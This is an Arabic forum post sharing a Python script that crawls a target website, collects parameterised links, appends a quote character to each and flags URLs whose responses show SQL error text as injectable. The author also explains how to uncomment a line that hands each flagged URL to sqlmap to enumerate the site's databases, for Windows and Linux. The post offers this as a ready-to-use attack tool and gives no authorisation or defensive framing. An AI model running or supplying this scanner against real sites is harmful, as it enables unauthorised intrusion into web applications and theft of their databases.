طريقة فحص المواقع من ثغرة sql وجلب الروابط

! Ṍ Ẍ Ỹ Ḡ Ē Ń !

! Ṍ Ẍ Ỹ Ḡ Ē Ń !


:: Cyber Security Engineer ::
طاقم الإدارة


السلام عليكم ورحمة الله وبركاته

البرمجة python 3.5
المكتبات
BeautifulSoup
requests

طبعا الاداة هذي وظيفتها جلب روابط الموقع وفحصها
وبالامكان تطويرها اكثر بكثير من ذلك
بعد تشغيل الاداة يطلب منك رابط
تضع الرابط فقط مثلا
http://xxx.com/
يقوم بسحب السورس الخاص بالموقع
واخراج كامل الروابط من داخل السورس
والبحث عن الروابط اللي فيها متغيرات
?id=2
مثلا اي متغير يجلبه
ويقوم بفحصها من ثغرة سكيول انجكشن
لو حصل ثغرة اخرج لك
الروابط اي رابط يخرج لك معناته مصاب

هذا الكود
كود:
import urllib.request
from bs4 import BeautifulSoup
import os
class scan:
    def get_full_url(self,html):
        listurll = list()
        soup = BeautifulSoup(html,'html.parser')
        full = list()
        for i in soup.findAll('a'):
            c = i.get('href')
            if ("=" in c):
                listurll.append(c)
            else:
                full.append(c)
        return listurll


    def get_html(self,url):
        fin = list()
        Open = urllib.request.urlopen(url)
        Reader = Open.read()
        f = self.get_full_url(Reader)
        return f

    def connect(self,url):
        fun = self.get_html(url)
        for io in fun:
            try:
                if "http" not in io:
                    io = url + io
                else:
                    io = io
                resp = urllib.request.urlopen(io + "%27")
                ree = resp.read()
                l = ("MySQL", "mysql_fetch_array", "warning", "sql", "You have an error in your SQL", "syntax","mssql","warning")
                for check in l:
                    if check in str(ree):
                        print("\r\n","Check The Url\r\n", "   ", io)
                        #os.system("python sqlmap.py -u {} --dbs".format(io))
                        break
                    else:
                        print("=",end="")
            except urllib.error.URLError as e:
                print(e)
                continue
            except urllib.error.HTTPError as e:
                print(e)
                continue



url = str(input("Enter Url >>> "))
cl = scan()
a = cl.connect(url)
طبعا لو اردت ان يتم استغلال الروابط اليا عن طريق اداة سكيول ماب
هنا
كود:
#os.system("python sqlmap.py -u {} --dbs".format(io))
فقط قك بازالة المربع من الكود

ويجب ان تكون الاداة بجانب اداة سكيول ماب بالويندوز
اصحب اللينكس فقط يستبدلون الرابط كامل بالرابط التالي
كود:
os.system("sqlmap -u {} --dbs".format(io))